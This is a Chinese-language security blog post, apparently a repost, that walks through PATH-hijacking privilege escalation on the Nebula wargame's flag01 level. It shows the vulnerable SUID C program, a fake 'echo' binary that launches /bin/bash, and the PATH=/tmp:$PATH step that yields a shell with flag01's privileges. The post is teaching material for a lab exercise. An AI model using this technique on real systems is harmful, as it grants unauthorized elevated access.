环境变量法提权

admin
admin
admin
140521
文章
117
评论
2020年8月15日10:41:16评论242 views字数 2677阅读8分55秒阅读模式

作者:隐念笎


     有些应用程序使用了system等函数调用了系统命令,但是没有使用绝对路径而是使用env命令从环境变量中进行查找,这就可能通过修改环境变量来进行权限提升

    看下面的例子,本例来自于nebula:


//flag01.c
#include <stdlib.h>#include <unistd.h>#include <string.h>#include <sys/types.h>#include <stdio.h>
int main(int argc, char **argv, char **envp){  gid_t gid;  uid_t uid;  gid = getegid();  uid = geteuid();
  setresgid(gid, gid, gid);  setresuid(uid, uid, uid);
  system("/usr/bin/env echo and now what?");}//编译后得到flag01程序,这个程序具有suid权限

    flag01程序通过env命令执行了echo命令

    1、创建自己的echo命令,保存在/tmp目录下

//echo.c
#include <stdlib.h>#include <unistd.h>#include <string.h>#include <sys/types.h>#include <stdio.h>
int main(int argc, char **argv, char **envp){  system("/bin/bash");}level01@nebula:/tmp$
//gcc -o echo echo.c

    2、查看下当前的环境变量

level01@nebula:/home/flag01$ envTERM=xterm-256colorSHELL=/bin/shSSH_CLIENT=192.168.109.216 52044 22OLDPWD=/homeSSH_TTY=/dev/pts/0USER=level01LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lz=01;31:*.xz=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.rar=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.axv=01;35:*.anx=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.axa=00;36:*.oga=00;36:*.spx=00;36:*.xspf=00;36:MAIL=/var/mail/level01PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/gamesPWD=/home/flag01LANG=en_US.UTF-8SHLVL=1HOME=/home/level01LANGUAGE=en_US:LOGNAME=level01SSH_CONNECTION=192.168.109.216 52044 192.168.109.196 22LESSOPEN=| /usr/bin/lesspipe %sLESSCLOSE=/usr/bin/lesspipe %s %s_=/usr/bin/envlevel01@nebula:/home/flag01$

    运行一下命令将/tmp目录加入PATH变量的最前面,是的env命令首先执行我们自己的echo命令

level01@nebula:/tmp$ PATH=/tmp:$PATH

    3、执行flag01程序,由于flag01程序具有suid位,所以flag01会以自身权限执行/tmp/echo命令。/tmp/echo又以flag01的权限执行了/bin/bash命令

因此我们得到了一个flag01权限的shell


原文链接:https://www.cnblogs.com/zlgxzswjy/p/10373808.html


免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年8月15日10:41:16
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   环境变量法提权https://cn-sec.com/archives/90584.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息